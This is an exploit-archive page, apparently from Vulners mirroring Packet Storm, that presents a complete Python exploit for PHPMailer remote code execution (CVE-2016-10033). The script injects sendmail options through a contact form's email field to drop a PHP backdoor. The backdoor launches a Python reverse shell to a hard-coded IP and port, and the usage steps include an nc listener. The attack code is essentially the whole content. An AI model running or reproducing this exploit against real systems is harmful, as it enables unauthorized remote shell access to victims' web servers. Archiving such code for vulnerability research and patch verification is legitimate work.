Lucene search
K

PHPMailer Remote Code Execution

🗓️ 29 Dec 2016 00:00:00Reported by anarc0derType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 480 Views

PHPMailer Remote Code Execution exploit using back connection for reverse shell. Exploit involves manipulating PHPMailer < 5.2.18 to gain remote code execution

Related
Code
`# Exploit Title: PHPMailer Exploit v1.0  
# Date: 29/12/2016  
# Exploit Author: Daniel aka anarc0der  
# Version: PHPMailer < 5.2.18  
# Tested on: Arch Linux  
# CVE : CVE 2016-10033  
  
Description:  
Exploiting PHPMail with back connection (reverse shell) from the target  
  
Usage:  
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033  
2 - Config your IP for reverse shell on payload variable  
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>  
3 - Open other terminal and run the exploit: python3 anarcoder.py  
  
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU  
  
Full Advisory:  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html  
"""  
  
from requests_toolbelt import MultipartEncoder  
import requests  
import os  
import base64  
from lxml import html as lh  
  
os.system('clear')  
print("\n")  
print(" aaaaaa aaaa aaa aaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaaa ")  
print("aaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")  
print("aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaaa aaaaaaaa")  
print("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaaa aaaaaaaa")  
print("aaa aaaaaa aaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa")  
print("aaa aaaaaa aaaaaaaa aaaaaa aaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaa aaa")  
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")  
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")  
  
target = 'http://localhost:8080'  
backdoor = '/backdoor.php'  
  
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'  
fields={'action': 'submit',  
'name': payload,  
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',  
'message': 'Pwned'}  
  
m = MultipartEncoder(fields=fields,  
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')  
  
headers={'User-Agent': 'curl/7.47.0',  
'Content-Type': m.content_type}  
  
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}  
  
  
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')  
r = requests.post(target, data=m.to_string(),  
headers=headers)  
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')  
r = requests.get(target+backdoor, headers=headers)  
if r.status_code == 200:  
print('[+] ExPLoITeD ' + target)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation